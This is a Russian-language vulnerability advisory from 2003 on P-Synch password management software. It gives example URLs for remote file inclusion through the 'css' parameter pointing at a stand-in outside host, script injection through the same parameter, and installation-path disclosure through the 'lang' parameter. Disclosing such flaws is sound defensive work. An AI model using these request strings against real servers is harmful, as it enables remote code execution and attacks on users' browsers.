Удаленное выполнение произвольных команд и межсайтовый скриптинг в P-Synch

Дата публикации:
02.06.2003
Всего просмотров:
868
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Раскрытие системных данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
P-Synch Total Password Management Solution
Описание: Несколько уязвимостей обнаружено в программном обеспечении управления паролями 'P-Synch'. Удаленный пользователь может выполнить произвольные команды на системе.

Сообщается, что удаленный пользователь может определить удаленное расположение для включаемого файла, который будет выполнен на целевом сервере. Пример:

https://path/to/psynch/nph-psf.exe?css=http://somesite/file
https://path/to/psynch/nph-psa.exe?css=http://somesite/file
Также сообщается, что удаленный пользователь может внедрить произвольный код сценария, который будет выполнен в браузере целевого пользователя. Пример:
https://path/to/psynch/nph-psf.exe?css=">[VBScript, JScript etc]
https://path/to/psynch/nph-psa.exe?css=">[VBScript, JScript etc]
Также сообщается, что удаленный пользователь может представить следующий тип URL, чтобы определить инсталляционный путь:
https://path/to/psynch/nph-psa.exe?lan g=
https://path/to/psynch/nph-psf.exe?lang=


Ссылки: Multiple Vulnerabilities In P-Synch Password Management
или введите имя

CAPTCHA